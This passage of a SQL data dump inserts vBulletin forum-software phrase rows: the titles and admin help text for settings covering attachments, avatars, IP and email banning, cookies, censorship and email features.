(38920, -1, 'setting_archiveenabled_desc', 'vbsettings', 'The Search-Friendly Archive works only under the Apache web server with PHP compiled as a module. \r\n \r\nIt provides a basic structure that search engines can spider to grab all the content on your site.', 'vbulletin', 'vBulletin Solutions', 1179237004, '3.6.7'),
(38921, -1, 'setting_archiveenabled_title', 'vbsettings', 'Forum Archive Enabled', 'vbulletin', '', 0, ''),
(38922, -1, 'setting_attachboxcount_desc', 'vbsettings', 'This option sets how many attachment upload input boxes are displayed on the upload form.', 'vbulletin', 'vBulletin Solutions', 1199365577, '3.7.0 Beta 4'),
(38923, -1, 'setting_attachboxcount_title', 'vbsettings', 'Attachment Upload Inputs', 'vbulletin', 'vBulletin Solutions', 1199365577, '3.7.0 Beta 4'),
(38924, -1, 'setting_attachfile_desc', 'vbsettings', 'Leave this setting alone. \r\n \r\nBefore 3.0.0 RC1, we stored attachments for each user in a sub folder named after that user\'s userid. This resulted in us having X folders for X users with attachments. Some systems couldn\'t cope when this number exceeded 32,768 so we altered this method for 3.0.0 RC1. Now each digit of the userid is made into a directory, i.e. userid 568 gets her attachments stored in /path/5/6/8. To use the new setting you must move all of your attachments back into the DB and then move them back out to the FS. This is the only way to \'activate\' the new option.', 'vbulletin', 'vBulletin Solutions', 1148682921, '3.6.0 Beta 1'),
(38925, -1, 'setting_attachfile_title', 'vbsettings', 'Save Attachments as Files', 'vbulletin', 'vBulletin Solutions', 1148682921, '3.6.0 Beta 1'),
(38926, -1, 'setting_attachlimit_desc', 'vbsettings', 'Number of files that may be attached to a single post. Set to \'0\' to have no limit.', 'vbulletin', 'vBulletin Solutions', 1199365568, '3.7.0 Beta 4'),
(38927, -1, 'setting_attachlimit_title', 'vbsettings', 'Attachments Per Post', 'vbulletin', 'vBulletin Solutions', 1199365568, '3.7.0 Beta 4'),
(38928, -1, 'setting_attachmentviewslive_desc', 'vbsettings', 'Option to update attachment views immediately, or once an hour. If you have a large number of inline graphic attachments, you will probably want to disable immediate updates, since they are quite server intensive.', 'vbulletin', '', 0, ''),
(38929, -1, 'setting_attachmentviewslive_title', 'vbsettings', 'Update Attachment Views Immediately', 'vbulletin', '', 0, ''),
(38930, -1, 'setting_attachpath_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1148682848, '3.6.0 Beta 1'),
(38931, -1, 'setting_attachpath_title', 'vbsettings', 'File Attachment Path', 'vbulletin', 'vBulletin Solutions', 1148682848, '3.6.0 Beta 1'),
(38932, -1, 'setting_attachresize_desc', 'vbsettings', 'If an image is larger than your maximum allowed dimensions or filesize, an attempt to resize it will be tried. This may fail if the image is too large to be successfully processed or if the image type is not supported for resizing. When this option is enabled, you should limit the Attachment Input options above to one, otherwise the uploading of multiple large images by one user could strain your server.', 'vbulletin', 'vBulletin Solutions', 1158183060, '3.6.2'),
(38933, -1, 'setting_attachresize_title', 'vbsettings', 'Resize Images', 'vbulletin', 'vBulletin Solutions', 1158183060, '3.6.2'),
(38934, -1, 'setting_attachrow_desc', 'vbsettings', 'How many thumbnails do you wish to display per line on user\'s post, assuming you allow more than one attachment per post?', 'vbulletin', 'vBulletin Solutions', 1199365591, '3.7.0 Beta 4'),
(38935, -1, 'setting_attachrow_title', 'vbsettings', 'Thumbnails Per Row', 'vbulletin', 'vBulletin Solutions', 1199365591, '3.7.0 Beta 4'),
(38936, -1, 'setting_attachthumbs_desc', 'vbsettings', 'If your version of PHP supports image functions, you may enable the creation of thumbnails for images. This is the master switch to enable/disable thumbnail display. Go to Attachments -> Attachment Manager -> Edit -> Display to choose what image types will be thumbnailed. You will need to go to Maintenance -> Update Counters -> Rebuild Attachment Thumbnails after changing this setting.', 'vbulletin', 'vBulletin Solutions', 1154965582, '3.6.1'),
(38937, -1, 'setting_attachthumbs_title', 'vbsettings', 'Thumbnail Creation', 'vbulletin', 'vBulletin Solutions', 1154965582, '3.6.1'),
(38938, -1, 'setting_attachthumbssize_desc', 'vbsettings', 'Maximum width and height that the thumbnail can have. The image will be proportionately resized so that the longest side is no larger than this setting. If you change this setting, you will need to go to Maintenance -> Update Counters -> Rebuild Attachment Thumbnails .', 'vbulletin', 'vBulletin Solutions', 1199365600, '3.7.0 Beta 4'),
(38939, -1, 'setting_attachthumbssize_title', 'vbsettings', 'Thumbnail Size', 'vbulletin', 'vBulletin Solutions', 1199365600, '3.7.0 Beta 4'),
(38940, -1, 'setting_attachtotalspace_desc', 'vbsettings', 'Use this option to limit the total combined amount of disk space in bytes that all attachments can occupy. \r\n \r\nSet the option to 0 to have no disk space limit.', 'vbulletin', '', 0, ''),
(38941, -1, 'setting_attachtotalspace_title', 'vbsettings', 'Limit Space Taken Up By Attachments (Total)', 'vbulletin', '', 0, ''),
(38942, -1, 'setting_attachurlcount_desc', 'vbsettings', 'This option sets how many attachment URL input boxes are displayed on the upload form.', 'vbulletin', 'vBulletin Solutions', 1199365584, '3.7.0 Beta 4'),
(38943, -1, 'setting_attachurlcount_title', 'vbsettings', 'Attachment URL Inputs', 'vbulletin', 'vBulletin Solutions', 1199365584, '3.7.0 Beta 4'),
(38944, -1, 'setting_avatarenabled_desc', 'vbsettings', 'Use this option to enable/disable the overall use of avatars. \r\n \r\nAvatars are small images chosen by the user and displayed under usernames in thread display and user info pages.', 'vbulletin', '', 0, ''),
(38945, -1, 'setting_avatarenabled_title', 'vbsettings', 'Avatars Enabled', 'vbulletin', '', 0, ''),
(38946, -1, 'setting_avatarpath_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1148682859, '3.6.0 Beta 1'),
(38947, -1, 'setting_avatarpath_title', 'vbsettings', 'Avatar File Path', 'vbulletin', 'vBulletin Solutions', 1148682859, '3.6.0 Beta 1'),
(38948, -1, 'setting_avatarurl_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1148682868, '3.6.0 Beta 1'),
(38949, -1, 'setting_avatarurl_title', 'vbsettings', 'Avatar URL', 'vbulletin', 'vBulletin Solutions', 1148682868, '3.6.0 Beta 1'),
(38950, -1, 'setting_badwords_desc', 'vbsettings', 'If there are special words that are very common for your forum, you may wish to remove them from being searchable. Searching for very common words on a large forum can be server intensive.\r\n\r\nSeparate each word with a space.', 'vbulletin', '', 0, ''),
(38951, -1, 'setting_badwords_title', 'vbsettings', 'Words to be excluded from search', 'vbulletin', '', 0, ''),
(38952, -1, 'setting_banemail_desc', 'vbsettings', 'Email address ban lists: You may ban any email addresses from registering and posting. Type in the complete email address (user@example.com), or use a partial email address (as in @example.com). \r\n \r\nNote that partial email addresses are matched from the end of the address unless you enable \'Aggressive Email Banning\' below. Therefore if you ban @example.com you will ban user@example.com, but if you ban @example that user will not be banned. If you enable \'Aggressive Email Banning\', user@example.com would be banned by @example. \r\n \r\nIf the email address of a user attempting to register or change their email address matches any of the addresses you specify here will see a no-permission error. For example, if you have banned \'example.com\' then a user attempting to use \'someone@example.com\' will be rejected. \r\n \r\nPut a space between each email address or email address fragment.', 'vbulletin', 'vBulletin Solutions', 1239102213, '3.8.3'),
(38953, -1, 'setting_banemail_title', 'vbsettings', 'Banned Email Addresses', 'vbulletin', 'vBulletin Solutions', 1239102213, '3.8.3'),
(38954, -1, 'setting_banip_desc', 'vbsettings', 'Use this option to prevent certain IP addresses from accessing any part of your board. \r\n \r\nIf you enter a complete IP address (242.21.11.7), only that IP will be banned. \r\nIf you enter a partial IP (243.21.11. or 243.21.11), any IPs that begin with the partial IP will be banned. For example, banning 243.21.11 will prevent 243.21.11.7 from accessing your board. However, 243.21.115.7 would still be able to access your board. \r\n \r\nYou may also use an \'*\' as a wildcard for increased flexibility. For example, if you enter 243.21.11*, many IPs will be banned including: 243.21.11.7, 243.21.115.7, 243.21.119.225. \r\n \r\nPlace a space or a line break between each IP address.', 'vbulletin', 'vBulletin Solutions', 1150741990, '3.6.0 Beta 3'),
(38955, -1, 'setting_banip_title', 'vbsettings', 'Banned IP Addresses', 'vbulletin', '', 0, ''),
(38956, -1, 'setting_bbactive_desc', 'vbsettings', 'From time to time, you may want to turn your forum off to the public while you perform maintenance, update versions, etc. When you turn your forum off, visitors will receive a message that states that the forum is temporarily unavailable. Administrators will still be able to see the forum. ', 'vbulletin', 'vBulletin Solutions', 1149700812, '3.6.0 Beta 1'),
(38957, -1, 'setting_bbactive_title', 'vbsettings', 'Forum Active', 'vbulletin', 'vBulletin Solutions', 1149700812, '3.6.0 Beta 1'),
(38958, -1, 'setting_bbclosedreason_desc', 'vbsettings', 'The text that is presented when the BB is closed. \r\n \r\nNote: as an administrator, you will be able to see the forums as usual, even when you have turned them off to the public.', 'vbulletin', '', 0, ''),
(38959, -1, 'setting_bbclosedreason_title', 'vbsettings', 'Reason For Turning Forum Off', 'vbulletin', '', 0, ''),
(38960, -1, 'setting_bbtitle_desc', 'vbsettings', 'Name of your forum. This appears in the title of every page.', 'vbulletin', '', 0, ''),
(38961, -1, 'setting_bbtitle_title', 'vbsettings', 'Forum Name', 'vbulletin', '', 0, ''),
(38962, -1, 'setting_bburl_desc', 'vbsettings', 'URL of your forum. \r\nNote: do not add a trailing slash. (\'/\')', 'vbulletin', '', 0, ''),
(38963, -1, 'setting_bburl_title', 'vbsettings', 'Forum URL', 'vbulletin', '', 0, ''),
(38964, -1, 'setting_blankasciistrip_desc', 'vbsettings', 'You may wish to prevent users from using certain characters in their posts, usernames, and more. These characters are usually only used to make words appear the same to a human but different to a computer. To prevent these characters from being used, enter their character codes (numbers) here, separated by spaces. You may prefix a character code with a \'u\' to denote it is a Unicode value; click the \'?\' icon on the right for more information. \r\n \r\nPlease note that stripping characters with this setting may break some double-byte character sets. If you are unsure or having problems with certain characters not displaying properly, remove the contents of this setting.', 'vbulletin', 'vBulletin Solutions', 1156173380, '3.6.1'),
(38965, -1, 'setting_blankasciistrip_title', 'vbsettings', 'Blank Character Stripper', 'vbulletin', 'vBulletin Solutions', 1156173380, '3.6.1'),
(38966, -1, 'setting_bounceemail_desc', 'vbsettings', 'The email address where bounce messages will be directed. If this field is blank, the Webmaster Email address will be used. \r\n \r\nThis email is used when using an SMTP server, or when the \'Enable -f Parameter\' email for sendmail is switched on.', 'vbulletin', 'vBulletin Solutions', 1201179693, '3.7.0 Beta 5'),
(38967, -1, 'setting_bounceemail_title', 'vbsettings', 'Bounce Email Address', 'vbulletin', 'vBulletin Solutions', 1201179693, '3.7.0 Beta 5'),
(38968, -1, 'setting_cachemaxage_desc', 'vbsettings', 'Number of days to maintain a cached copy of a post. This makes threads faster to display, but means that each post takes approximately twice the storage space.', 'vbulletin', '', 0, ''),
(38969, -1, 'setting_cachemaxage_title', 'vbsettings', 'Cached Posts Lifespan', 'vbulletin', '', 0, ''),
(38970, -1, 'setting_calformat1_desc', 'vbsettings', 'Format of date shown in profile when user gives their birth-year.', 'vbulletin', '', 0, ''),
(38971, -1, 'setting_calformat1_title', 'vbsettings', 'Format For Birthdays with Year Specified', 'vbulletin', '', 0, ''),
(38972, -1, 'setting_calformat2_desc', 'vbsettings', 'Format of user\'s birthday shown on profile when the user does not specify their birth-year. \r\nDO NOT put in a code for the year. ', 'vbulletin', '', 0, ''),
(38973, -1, 'setting_calformat2_title', 'vbsettings', 'Format For Birthdays with Year Unspecified', 'vbulletin', '', 0, ''),
(38974, -1, 'setting_censorchar_desc', 'vbsettings', 'This character (or characters) will be used to replace censored words. For example, if you have censored the word \'dog\' and you set the censor character here to an asterisk (*) then any occurrences of \'dog\' in messages will appear as \'***\'.', 'vbulletin', '', 0, ''),
(38975, -1, 'setting_censorchar_title', 'vbsettings', 'Character to Replace Censored Words', 'vbulletin', '', 0, ''),
(38976, -1, 'setting_censorwords_desc', 'vbsettings', 'Type all words you want censored in the field below. Do not use commas to separate words, just use spaces. For example, type \'dog cat boy\', rather than \'dog, cat, boy.\' \r\n \r\nIf you type \'dog\', all words containing the string \'dog\' would be censored (dogma, for instance, would appear as \'***ma\'). To censor more accurately, you can require that censors occur only for exact words. You can do this by placing a censor word in curly braces, as in {dog}. Signifying \'dog\' in the curly braces would mean that dogma would appear as dogma, but dog would appear as \'***\'. Thus your censor list may appear as: cat {dog} {barn} barn \r\n \r\nDo not use quotation marks and make sure you use curly braces, not parentheses, when specifying exact words. You will need to Rebuild the Post Cache after making changes to update existing posts.', 'vbulletin', '', 0, ''),
(38977, -1, 'setting_censorwords_title', 'vbsettings', 'Censored Words', 'vbulletin', '', 0, ''),
(38978, -1, 'setting_checkcoppa_desc', 'vbsettings', 'This option will save a cookie onto the user\'s computer if an age under 13 is entered. Subsequent registration attempts will be failed, no matter what age is entered. This only applies if the previous option is set to either Enable COPPA or Deny registration for users under 13 years .', 'vbulletin', 'vBulletin Solutions', 1144879730, '3.6.0 Beta 1'),
(38979, -1, 'setting_checkcoppa_title', 'vbsettings', 'COPPA Registration System Cookie Check', 'vbulletin', 'vBulletin Solutions', 1205941780, '3.7.0 Release Candidate 1'),
(38980, -1, 'setting_checknewpm_desc', 'vbsettings', 'Selecting \'Yes\' for this option will cause the system to check the private message database every time a user loads a page, and will display a visible prompt if a new message has just been saved.', 'vbulletin', '', 0, ''),
(38981, -1, 'setting_checknewpm_title', 'vbsettings', 'Instant Messaging Support - Check for New Private Messages', 'vbulletin', '', 0, ''),
(38982, -1, 'setting_cleargifurl_desc', 'vbsettings', 'Please enter the path of your clear.gif image, relative to your forum directory. \r\nBy default, the value of this setting is \'clear.gif\', meaning that the image is located in the base directory of your vBulletin installation (in the same folder as forumdisplay.php). \r\n \r\nThis URL must be relative, NOT beginning with \'http://\' .', 'vbulletin', '', 0, ''),
(38983, -1, 'setting_cleargifurl_title', 'vbsettings', 'Location of clear.gif', 'vbulletin', '', 0, ''),
(38984, -1, 'setting_codemaxlines_desc', 'vbsettings', 'When a user posts a block of [CODE], [PHP] or [HTML] in one of their messages, the system will place it in a box, which expands to contain their message. \r\n \r\nThis value controls the number of lines at which the box stops adding height and inserts a scrollbar.', 'vbulletin', 'vBulletin Solutions', 1199365427, '3.7.0 Beta 4'),
(38985, -1, 'setting_codemaxlines_title', 'vbsettings', 'Maximum [CODE] Lines', 'vbulletin', 'vBulletin Solutions', 1199365427, '3.7.0 Beta 4'),
(38986, -1, 'setting_companyname_desc', 'vbsettings', 'The name of your company. This is required for COPPA compliance.', 'vbulletin', '', 0, ''),
(38987, -1, 'setting_companyname_title', 'vbsettings', 'Company Name', 'vbulletin', '', 0, ''),
(38988, -1, 'setting_contactusemail_desc', 'vbsettings', 'Email address for receiving the emails from Contact Us page by default. If you leave this option empty, Webmaster\'s Email will be used.', 'vbulletin', 'vBulletin Solutions', 1265201751, '3.8.5'),
(38989, -1, 'setting_contactusemail_title', 'vbsettings', 'Contact Us Email', 'vbulletin', 'vBulletin Solutions', 1265201751, '3.8.5'),
(38990, -1, 'setting_contactuslink_desc', 'vbsettings', 'Link for contacting the site admin. To use the built-in email form, specify sendmessage.php otherwise use something such as \'mailto:webmaster@example.com\' or your own custom form. This appears at the bottom of every page.', 'vbulletin', '', 0, ''),
(38991, -1, 'setting_contactuslink_title', 'vbsettings', 'Contact Us Link', 'vbulletin', '', 0, ''),
(38992, -1, 'setting_contactusoptions_desc', 'vbsettings', 'You may pre-define subjects (and corresponding recipients) for users to pick from when using the default Contact Us form listed above. Please place one subject per line. An \'Other\' option will be automatically added to the end when the form is viewed.', 'vbulletin', '', 0, ''),
(38993, -1, 'setting_contactusoptions_title', 'vbsettings', 'Contact Us Options', 'vbulletin', '', 0, ''),
(38994, -1, 'setting_contactusother_desc', 'vbsettings', 'If set to \'Yes\', there will be an option in Subject section of Contact Us page to let visitors to input custom subject.', 'vbulletin', 'vBulletin Solutions', 1265201494, '3.8.5'),
(38995, -1, 'setting_contactusother_title', 'vbsettings', 'Allow to Send \'Other\' Subject in Contact Us Page', 'vbulletin', 'vBulletin Solutions', 1265201494, '3.8.5'),
(38996, -1, 'setting_contactustype_desc', 'vbsettings', 'The last option only applies if you specify \'sendmessage.php\' in the previous option. You may require guests to pass Human Verification in order to use this form by enabling the option found in the Human Verification Options .', 'vbulletin', 'vBulletin Solutions', 1205428348, '3.7.0 Release Candidate 1'),
(38997, -1, 'setting_contactustype_title', 'vbsettings', 'Allow Unregistered Users to use \'Contact Us\'', 'vbulletin', 'vBulletin Solutions', 1205428348, '3.7.0 Release Candidate 1'),
(38998, -1, 'setting_cookiedomain_desc', 'vbsettings', 'This option sets the domain on which the cookie is active. The most common reason to change this setting is that you have two different urls to your forum, i.e. example.com and forums.example.com. To allow users to stay logged into the forum if they visit via either url, you would set this to .example.com (note the domain begins with a dot . \r\n \r\nSuggested valid values for Cookie Domain are available in the drop-down menu opposite. If you have a good reason to want a different setting, check the checkbox and enter the desired value in the box provided. \r\n \r\nYou most likely want to leave this setting blank as entering an invalid setting can leave you unable to login to your forum. ', 'vbulletin', 'vBulletin Solutions', 1226408418, '3.8.0 Beta 3'),
(38999, -1, 'setting_cookiedomain_title', 'vbsettings', 'Cookie Domain', 'vbulletin', 'vBulletin Solutions', 1179237133, '3.6.7'),
(39000, -1, 'setting_cookiepath_desc', 'vbsettings', 'The path to which the cookie is saved. If you run more than one forum on the same domain, it will be necessary to set this to the individual directories of the forums. Otherwise, just leave it as / . \r\n \r\nSuggested valid values for Cookie Path are available in the drop-down menu opposite. If you have a good reason to want a different setting, check the checkbox and enter the desired value in the box provided. \r\n \r\nPlease note that your path should always end in a forward-slash; for example \'/forums/\', \'/vbulletin/\' etc. \r\nEntering an invalid setting can leave you unable to login to your forum. ', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(39001, -1, 'setting_cookiepath_title', 'vbsettings', 'Path to Save Cookies', 'vbulletin', 'vBulletin Solutions', 1179237140, '3.6.7'),
(39002, -1, 'setting_cookietimeout_desc', 'vbsettings', 'This is the time in seconds that a user must remain inactive before their login session expires. This setting also controls how long a user will remain on Who\'s Online after their last activity.', 'vbulletin', 'vBulletin Solutions', 1199365158, '3.7.0 Beta 4'),
(39003, -1, 'setting_cookietimeout_title', 'vbsettings', 'Session Timeout', 'vbulletin', 'vBulletin Solutions', 1199365158, '3.7.0 Beta 4'),
(39004, -1, 'setting_copypostindex_desc', 'vbsettings', 'Setting this option to yes will cause search index information to be copied with each post in the thread. This allows the copied version of the thread to be searchable.\r\n \r\nHowever, on larger boards, this may cause significant delays in copying a thread. If this is a problem for you, we recommend disabling this option.', 'vbulletin', '', 0, ''),
(39005, -1, 'setting_copypostindex_title', 'vbsettings', 'Duplicate Search Index Information on Thread Copy?', 'vbulletin', '', 0, ''),
(39006, -1, 'setting_copyrighttext_desc', 'vbsettings', 'Copyright text to insert in the footer of the page.', 'vbulletin', '', 0, ''),
(39007, -1, 'setting_copyrighttext_title', 'vbsettings', 'Copyright Text', 'vbulletin', '', 0, ''),
(39008, -1, 'setting_cp_collapse_forums_desc', 'vbsettings', 'There are three options for the display of the Forum Manager: \r\n\r\n Default - Displays all of the forums on one page but may not work on all browsers, especially if you have a large number of forums. \r\n Collapsible - Allows collapsing/expansion of certain forums within the forum manager. This may reduce the ease of usability of the forum manager, but will prevent rendering problems with the dropdown menus with certain browsers/operating systems. \r\n Single - Display a single dropdown from which you may choose the forum you wish to modify. This is most useful if you have a large number of forums. \r\n ', 'vbulletin', '', 0, ''),
(39009, -1, 'setting_cp_collapse_forums_title', 'vbsettings', 'Forum Manager Display', 'vbulletin', '', 0, ''),
(39010, -1, 'setting_cp_usereditcolumns_desc', 'vbsettings', 'Number of columns to display in user editor. Smaller resolutions will probably want to set this to 1.', 'vbulletin', '', 0, ''),
(39011, -1, 'setting_cp_usereditcolumns_title', 'vbsettings', 'User Editor Columns', 'vbulletin', '', 0, ''),
(39012, -1, 'setting_cpstylefolder_desc', 'vbsettings', 'This setting allows you to specify an alternative style for the Admin / Moderator Control Panels, based on a folder contained within the \'cpstyles\' folder. The style you select here will be displayed to all Moderators, and any Administrators who have not expressed their own preference. \r\n \r\nFolders in the \'cpstyles\' folder must contain at least the following: \r\n \r\n- controlpanel.css \r\n- cp_logo.gif \r\n- cp_help.gif', 'vbulletin', 'vBulletin Solutions', 1192012621, '3.7.0 Beta 1'),
(39013, -1, 'setting_cpstylefolder_title', 'vbsettings', 'Control Panel Style Folder', 'vbulletin', 'vBulletin Solutions', 1192012621, '3.7.0 Beta 1'),
(39014, -1, 'setting_ctCensorMod_desc', 'vbsettings', 'Do you want to exempt your forum Moderators from the censor words? You will want to set this to yes if you censor anything that is part of a moderator\'s title like \'moderator\' as they have custom titles by default and will get censored.', 'vbulletin', '', 0, ''),
(39015, -1, 'setting_ctCensorMod_title', 'vbsettings', 'Exempt Moderators From Censor', 'vbulletin', '', 0, ''),
(39016, -1, 'setting_ctCensorWords_desc', 'vbsettings', 'Type all words you want censored in the Usertitle in the field below. Do not use commas to separate words, just use spaces. For example, type \'dog cat boy\', rather than \'dog, cat, boy.\' \r\n \r\nIf you type \'dog\', all words containing the string \'dog\' would be censored (dogma, for instance, would appear as \'***ma\'). To censor more accurately, you can require that censors occur only for exact words. You can do this by placing a censor word in curly braces, as in {dog}. Signifying \'dog\' in the curly braces would mean that dogma would appear as dogma, but dog would appear as \'***\'. Thus your censor list may appear as: cat {dog} {barn} barn \r\n \r\nDo not use quotation marks and make sure you use curly braces, not parentheses, when specifying exact words.', 'vbulletin', '', 0, ''),
(39017, -1, 'setting_ctCensorWords_title', 'vbsettings', 'Censored Words for Usertitle', 'vbulletin', '', 0, ''),
(39018, -1, 'setting_ctMaxChars_desc', 'vbsettings', 'This is the maximum number of characters allowed for a user\'s custom title.', 'vbulletin', 'vBulletin Solutions', 1199365244, '3.7.0 Beta 4'),
(39019, -1, 'setting_ctMaxChars_title', 'vbsettings', 'User Title Maximum Characters', 'vbulletin', 'vBulletin Solutions', 1199365244, '3.7.0 Beta 4'),
(39020, -1, 'setting_dateformat_desc', 'vbsettings', 'Format in which the date is presented on vBulletin pages: \r\n \r\nSee: http://www.php.net/manual-lookup.php?function=date \r\n \r\nExamples: \r\nUS Format (e.g., 04-25-98): m-d-y \r\nExpanded US Format (e.g., April 25th, 1998): F jS, Y \r\nEuropean Format (e.g., 25-04-98): d-m-y \r\nExpanded European Format (e.g., 25th April 1998): jS F Y', 'vbulletin', '', 0, ''),
(39021, -1, 'setting_dateformat_title', 'vbsettings', 'Format For Date', 'vbulletin', '', 0, ''),
(39022, -1, 'setting_datescore_desc', 'vbsettings', 'The newest item in the result set will score this number, with the score decreasing to 0 for the oldest item in the result set.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39023, -1, 'setting_datescore_title', 'vbsettings', 'Search Relevance Date Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39024, -1, 'setting_defaultregoptions_desc', 'vbsettings', 'The user options on the New User creation form in the Admin Control Panel, as well as the New User registration form will default to the following settings.', 'vbulletin', 'vBulletin Solutions', 1226600218, '3.8.0 Beta 3'),
(39025, -1, 'setting_defaultregoptions_title', 'vbsettings', 'Default Registration Options', 'vbulletin', 'vBulletin Solutions', 1226600218, '3.8.0 Beta 3'),
(39026, -1, 'setting_description_desc', 'vbsettings', 'Enter the meta description for all pages. This is used by search engines to index your pages more relevantly.', 'vbulletin', 'vBulletin Solutions', 1163501757, '3.6.4'),
(39027, -1, 'setting_description_title', 'vbsettings', 'Meta Description', 'vbulletin', 'vBulletin Solutions', 1163501757, '3.6.4'),
(39028, -1, 'setting_disable_ajax_desc', 'vbsettings', 'AJAX uses JavaScript and features of recent browsers to allow additional data to be retrieved without doing a page refresh, such as posting with quick reply or editing a thread title inline. \r\n \r\nThese features may cause problems with boards not running in English. You may use this setting to disable all AJAX features or just the ones problematic with non-English boards.', 'vbulletin', '', 0, ''),
(39029, -1, 'setting_disable_ajax_title', 'vbsettings', 'Disable AJAX Features', 'vbulletin', '', 0, ''),
(39030, -1, 'setting_disableerroremail_desc', 'vbsettings', 'If you would like to prevent vBulletin from sending email to the $config[\'Database\'][\'technicalemail\'] address you specified in config.php, set this value to \'Yes\'.\r\nError reports about database connection errors will still be sent. \r\nIt is not recommended that you set this value to \'Yes\' unless you are logging database errors to a file. (see above) \r\n ', 'vbulletin', '', 0, ''),
(39031, -1, 'setting_disableerroremail_title', 'vbsettings', 'Disable Database Error Email Sending', 'vbulletin', '', 0, ''),
(39032, -1, 'setting_displayemails_desc', 'vbsettings', 'Allow users to send emails to other users. Use the option below to determine how the emails are sent.', 'vbulletin', '', 0, ''),
(39033, -1, 'setting_displayemails_title', 'vbsettings', 'Allow Users to Email Other Members', 'vbulletin', '', 0, ''),
(39034, -1, 'setting_displayloggedin_desc', 'vbsettings', 'Displays those users that have been active in the last XXX seconds on the home page, where XXX is the value specified by your Cookie Time-Out option (Default is last 15 minutes). Not recommended for sites with hundreds of simultaneous users. The Alphabetical option requires more resources than the random option.', 'vbulletin', 'vBulletin Solutions', 1145485124, '3.6.0 Beta 1'),
(39035, -1, 'setting_displayloggedin_title', 'vbsettings', 'Display Logged in Users?', 'vbulletin', 'vBulletin Solutions', 1145485124, '3.6.0 Beta 1'),
(39036, -1, 'setting_dstonoff_desc', 'vbsettings', 'If Daylight Savings Time is currently in effect for the above time zone, enable this option so that guests will see the correct times on posts and events. This has no effect on registered users as they control their DST options in the User CP. ', 'vbulletin', '', 0, ''),
(39037, -1, 'setting_dstonoff_title', 'vbsettings', 'Enable Daylight Savings', 'vbulletin', '', 0, ''),
(39038, -1, 'setting_editormodes_desc', 'vbsettings', 'This global switch allows you to completely disable the message formatting toolbar and clickable smilies.', 'vbulletin', '', 0, ''),
(39039, -1, 'setting_editormodes_title', 'vbsettings', 'Enable Clickable Message Formatting Controls', 'vbulletin', '', 0, ''),
(39040, -1, 'setting_editthreadtitlelimit_desc', 'vbsettings', 'Specify the time-limit (in minutes) within which the thread title may be edited by the user whom started the thread.', 'vbulletin', 'vBulletin Solutions', 1171895209, '3.6.5'),
(39041, -1, 'setting_editthreadtitlelimit_title', 'vbsettings', 'Time Limit on Editing of Thread Title', 'vbulletin', '', 0, ''),
(39042, -1, 'setting_edittimelimit_desc', 'vbsettings', 'Time limit (in minutes) to impose on editing of messages. After this time limit only moderators will be able edit or delete the message. 1 day is 1440 minutes. \r\n \r\nSet the value to 0 to allow users to edit their posts indefinitely.', 'vbulletin', '', 0, ''),
(39043, -1, 'setting_edittimelimit_title', 'vbsettings', 'Time Limit on Editing of Posts', 'vbulletin', '', 0, ''),
(39044, -1, 'setting_emailfloodtime_desc', 'vbsettings', 'Specify in seconds how much time must elapse before a user may send consecutive emails. \r\n \r\nSet to 0 to disable this flood check. Admins are always exempt from this floodcheck.', 'vbulletin', 'vBulletin Solutions', 1199365182, '3.7.0 Beta 4'),
(39045, -1, 'setting_emailfloodtime_title', 'vbsettings', 'Email Flood Check', 'vbulletin', 'vBulletin Solutions', 1199365182, '3.7.0 Beta 4'),
(39046, -1, 'setting_emailsendnum_desc', 'vbsettings', 'vBulletin includes a mail queuing system to prevent bottlenecks when sending lots of email. Use this option to specify how many emails will be sent per batch.', 'vbulletin', 'vBulletin Solutions', 1199365188, '3.7.0 Beta 4'),
(39047, -1, 'setting_emailsendnum_title', 'vbsettings', 'Number of Emails to Send Per Batch', 'vbulletin', 'vBulletin Solutions', 1199365188, '3.7.0 Beta 4'),
(39048, -1, 'setting_enable_inlinemod_auth_desc', 'vbsettings', 'Inline moderation actions will require a user to authenticate again prior to being performed. The timeout is based on the admin control panel timeout, or one hour if that option is disabled.', 'vbulletin', 'vBulletin Solutions', 1198079211, '3.7.0 Beta 3'),
(39049, -1, 'setting_enable_inlinemod_auth_title', 'vbsettings', 'Enable Inline Moderation Authentication', 'vbulletin', 'vBulletin Solutions', 1198079211, '3.7.0 Beta 3'),
(39050, -1, 'setting_enableaccess_desc', 'vbsettings', 'Access masks are a simple way to manage forum permissions for individual users. If you don\'t use any access masks, turn this option off.', 'vbulletin', '', 0, ''),
(39051, -1, 'setting_enableaccess_title', 'vbsettings', 'Enable Access Masks', 'vbulletin', '', 0, ''),
(39052, -1, 'setting_enablebanning_desc', 'vbsettings', 'Banning allows you to stop certain IP addresses and email addresses from registering and posting to the forum.', 'vbulletin', '', 0, ''),
(39053, -1, 'setting_enablebanning_title', 'vbsettings', 'Enable Banning Options', 'vbulletin', '', 0, ''),
(39054, -1, 'setting_enablecensor_desc', 'vbsettings', 'You may have certain words censored on your forum. Words you choose to censor will be replaced by the character you specify below. All message titles and messages will be affected.', 'vbulletin', '', 0, ''),
(39055, -1, 'setting_enablecensor_title', 'vbsettings', 'Censorship Enabled', 'vbulletin', '', 0, ''),
(39056, -1, 'setting_enableemail_desc', 'vbsettings', 'Enable the following email-sending features: \r\nReport Bad Post \r\n\'Contact Us\' Link \r\nEmail a Member \r\nEmail this Page to a Friend \r\nNew Post Notifications to Members \r\n \r\nYou can turn off the \'Send to Friend\' feature for individual user groups in the User Permissions area .', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39057, -1, 'setting_enableemail_title', 'vbsettings', 'Enable Email features?', 'vbulletin', '', 0, ''),
(39058, -1, 'setting_enablehooks_desc', 'vbsettings', 'This setting allows you to globally enable or disable the plugin/hook system. \r\n \r\nBy switching the system off, only vBulletin-native code will be run, so it can be used to establish whether errors exist within vBulletin itself or in plugin code.', 'vbulletin', '', 0, ''),
(39059, -1, 'setting_enablehooks_title', 'vbsettings', 'Enable Plugin/Hook System', 'vbulletin', '', 0, ''),
(39060, -1, 'setting_enablememberlist_desc', 'vbsettings', 'Enable the member list? This allows users to view all users who belong to those usergroups that have \'Viewable on Memberlist\' enabled (See User Groups ->Modify ).', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
